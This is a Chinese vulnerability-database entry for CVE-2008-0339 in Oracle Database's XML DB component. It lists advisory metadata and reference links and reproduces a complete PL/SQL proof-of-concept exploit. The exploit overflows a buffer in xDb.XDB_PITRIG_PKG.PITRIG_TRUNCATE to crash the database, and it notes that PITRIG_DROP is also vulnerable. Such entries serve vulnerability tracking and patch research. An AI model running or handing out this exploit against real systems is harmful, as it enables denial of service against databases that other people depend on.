Oracle Database XML DB组件未明漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114275 漏洞类型 设计错误
发布时间 2008-01-10 更新时间 2008-09-05
CVE编号 CVE-2008-0339 CNNVD-ID CNNVD-200801-274
漏洞平台 Multiple CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/31010
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200801-274
|漏洞详情
OracleDatabase是一款商业性质大型数据库系统。OracleOracleDatabase9.2.0.8、9.2.0.8DV、10.1.0.5和10.2.0.3版本的XMLDB组件存在未明漏洞,远程攻击者通过未明的向量产生未知的影响。(DB01)
|漏洞EXP
source: http://www.securityfocus.com/bid/27229/info

Oracle has released its critical patch update for January 2008. The advisory addresses 26 vulnerabilities affecting Oracle Database, Oracle Application Server, Oracle Collaboration Suite, Oracle E-Business Suite, Oracle Enterprise Manager, and Oracle People Soft Enterprise.

The issues identified by the vendor affect all security properties of the Oracle products and present local and remote threats. Various levels of authorization are needed to leverage some of the issues, but other issues do not require any authorization. The most severe of the vulnerabilities could possibly compromise affected computers. 

/******************************************************************/
/******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE *********/
/*******                BUFFER OVERFLOW                   *********/
/******************************************************************/
/************    POC exploit , Crash database        **************/
/******************************************************************/
/******************  BY Sh2kerr (Digital Security)  ***************/
/******************************************************************/
/***************** tested on oracle 10.1.0.2.0  *******************/
/******************************************************************/
/******************************************************************/
/*         Date of Public EXPLOIT:  January 28, 2008              */
/*         Written by:              Alexandr "Sh2kerr" Polyakov   */
/*         email:                   Alexandr.Polyakov@dsec.ru     */
/*         site:                    http://www.dsec.ru            */
/******************************************************************/
/*  Original Advisory by:                                         */
/*      Alexandr Polyakov [ Alexandr.Polyakov@dsec.ru]            */
/*      Reported: 18  Dec 2007                                    */
/*      Date of Public Advisory: January 15, 2008                 */
/*      Advisory: http://www.oracle.com/technology/deploy/        */
/*                security/critical-patch-updates/cpujan2008.html */
/*                                                                */
/******************************************************************/
/*  thanks to oraclefun for his pitrig_dropmetadata exploit       */
/*                                                                */
/******************************************************************/


set serveroutput on
declare
     buff varchar2(32767);
     begin
      /* generate evil buffer */
      buff:='12345678901234567890123456789';
      buff:=buff||buff;
      buff:=buff||buff;
      buff:=buff||buff;
      buff:=buff||buff;
      buff:=buff||buff;
      buff:=buff||'0012345678901234567890123sh2kerr';
      /* lets see the buffer size */
      dbms_output.put_line('SEND EVIL BUFFER SIZE:'||Length(buff));
      xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE(buff,buff);
     end;
   /


/* P.S.      xDb.XDB_PITRIG_PKG.PITRIG_DROP is also vulnerable */


/******************************************************************/
/*************************** SEE U LATER  ;)  ***********************/
/******************************************************************/
|参考资料

来源:US-CERT
名称:TA08-017A
链接:http://www.us-cert.gov/cas/techalerts/TA08-017A.html
来源:www.oracle.com
链接:http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2008.html
来源:HP
名称:SSRT061201
链接:http://marc.info/?l=bugtraq&m=120058413923005&w=2
来源:BID
名称:27229
链接:http://www.securityfocus.com/bid/27229
来源:VUPEN
名称:ADV-2008-0150
链接:http://www.frsirt.com/english/advisories/2008/0150
来源:SECTRACK
名称:1019218
链接:http://securitytracker.com/id?1019218
来源:SECUNIA
名称:28518
链接:http://secunia.com/advisories/28518
来源:VUPEN
名称:ADV-2008-0180
链接:http://www.frsirt.com/english/advisories/2008/0180
来源:SECUNIA
名称:28556
链接:http://secunia.com/advisories/28556